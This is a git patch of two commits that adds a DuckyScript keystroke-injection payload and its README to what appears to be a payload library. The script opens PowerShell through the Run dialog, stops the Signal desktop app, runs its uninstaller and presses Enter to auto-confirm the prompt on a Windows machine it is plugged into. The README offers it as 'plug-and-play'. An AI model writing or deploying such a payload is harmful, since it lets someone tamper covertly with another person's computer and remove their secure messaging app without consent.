From d097122051092cdf56141ee3ba304a3e8dc23060 Mon Sep 17 00:00:00 2001 From: Aleff Date: Mon, 12 Jun 2023 14:29:08 +0200 Subject: [PATCH 1/2] Uninstall Signal --- .../execution/UninstallSignal/payload.txt | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 payloads/library/execution/UninstallSignal/payload.txt diff --git a/payloads/library/execution/UninstallSignal/payload.txt b/payloads/library/execution/UninstallSignal/payload.txt new file mode 100644 index 0000000..9006fba --- /dev/null +++ b/payloads/library/execution/UninstallSignal/payload.txt @@ -0,0 +1,30 @@ +REM ##################################### +REM # | +REM # Title : Uninstall Signal | +REM # Author : Aleff | +REM # Version : 1.0 | +REM # Category : Execution | +REM # Target : Windows 10-11 | +REM # | +REM ##################################### + +REM Plug-And-Play <3 + +REM Requirements: +REM - Signal App installed +REM - ExecutionPolicy Bypass + +DELAY 2000 +GUI r +DELAY 1000 +STRING powershell +ENTER +DELAY 2000 + +STRINGLN Stop-Process -Name "Signal" +DELAY 500 +STRINGLN Start-Process "$env:LocalAppData\Programs\signal-desktop\Uninstall Signal.exe" +DELAY 1000 +REM Popup "Are you sure?" +ENTER +ALT F4 From 3468711c211e57e0e87a0ca18d616e388a311f35 Mon Sep 17 00:00:00 2001 From: aleff-github Date: Mon, 12 Jun 2023 14:29:28 +0200 Subject: [PATCH 2/2] Create README.md --- .../execution/UninstallSignal/README.md | 20 +++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 payloads/library/execution/UninstallSignal/README.md diff --git a/payloads/library/execution/UninstallSignal/README.md b/payloads/library/execution/UninstallSignal/README.md new file mode 100644 index 0000000..cd4cfd3 --- /dev/null +++ b/payloads/library/execution/UninstallSignal/README.md @@ -0,0 +1,20 @@ +# Uninstall Signal + +A script used to uninstall signal-desktop app on Windows users. + +**Category**: Execution + +## Description + +A script used to uninstall signal-desktop app on Windows users. + +Open a PowerShell, stop the Signal proccess if it runs and then execute the uninstall file trhough general path. + +## Dependencies + +* Signal App installed (obviously LOL) +* ExecutionPolicy Bypass + +## Settings + +- Nothing to set, this payload is Plug-And-Play <3